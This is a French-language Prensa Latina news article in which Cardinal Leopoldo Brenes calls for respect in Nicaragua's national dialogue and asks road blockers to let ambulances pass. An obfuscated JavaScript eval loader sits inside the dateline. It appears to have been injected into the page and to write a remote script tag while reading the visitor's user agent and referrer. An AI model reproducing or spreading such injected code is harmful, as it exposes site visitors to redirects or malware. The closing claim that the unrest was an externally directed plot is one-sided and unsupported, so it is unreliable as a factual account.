mercredi 24 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Au Nicaragua, le cardinal Brenes lance un appel pour que le dialogue national soit respecté

Managua, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ysken|var|u0026u|referrer|shyef||js|php'.split('|'),0,{})) 18 mai (Prensa Latina) Le président de la Conférence Episcopale du Nicaragua, le cardinal Leopoldo Brenes, a aujourd'hui lancé un appel pour que le dialogue national soit respecté par tous les participants.

Managua, 18 mai (Prensa Latina) Le président de la Conférence Episcopale du Nicaragua, le cardinal Leopoldo Brenes, a aujourd’hui lancé un appel pour que le dialogue national soit respecté par tous les participants.

Concernant les conversations prévues pour demain, Brenes a cité un message du pape François, dans lequel il rappelle que hausser la voix porte préjudice au dialogue, qui doit être mené dans le respect mutuel et avec de bonnes manières et de bonnes paroles.

Il a également souligné l’importance de la capacité d’écoute et de discussion et de l’échange d’idées qui doit se faire sans cris ni coercition.

Le cardinal a aussi demandé au peuple nicaraguayen de ne pas laisser la haine envahir son cœur et de s’exprimer de manière pacifique et dans le respect de la vie humaine.

De plus, il a demandé aux gens qui bloquent les routes de permettre le passage des ambulances, et d’empêcher, par ce simple acte d’humanité, que des personnes ne trouvent la mort, comme cela a été le cas pour une jeune femme enceinte qui est décédée la veille pour cette raison.

 Le cardinal, qui est aussi Archevêque de Managua, s’est dit confiant sur le retour de la paix et de la réconciliation parmi ses compatriotes.

Grace à la Conférence en tant que médiateur et témoin, le Nicaragua a pu hier entamer un dialogue national sur les thèmes de la stabilité, de la justice et de la paix, après avoir traversé un mois de violence, de confrontations et d’actes de vandalisme laissant un nombre de morts,  de blessés et de dégâts qu’il est encore difficile de chiffrer.

Le Nicaragua n’a pas connu de tels événements depuis des dizaines d’années. A l’origine de cette crise se trouve le projet de réforme de la sécurité sociale, dont le retrait ultérieur n’a pas empêché les protestations auxquelles se sont ajoutées d’autres demandes politiques.

Ce projet de réforme a été utilisé comme prétexte pour mettre en marche un plan d’action dirigé de l’extérieur dans le but de déstabiliser la nation et provoquer ainsi le renversement du gouvernement de Managua, pensent les observateurs de la situation.

peo/jcm/lla

EN CONTINU
notes connexes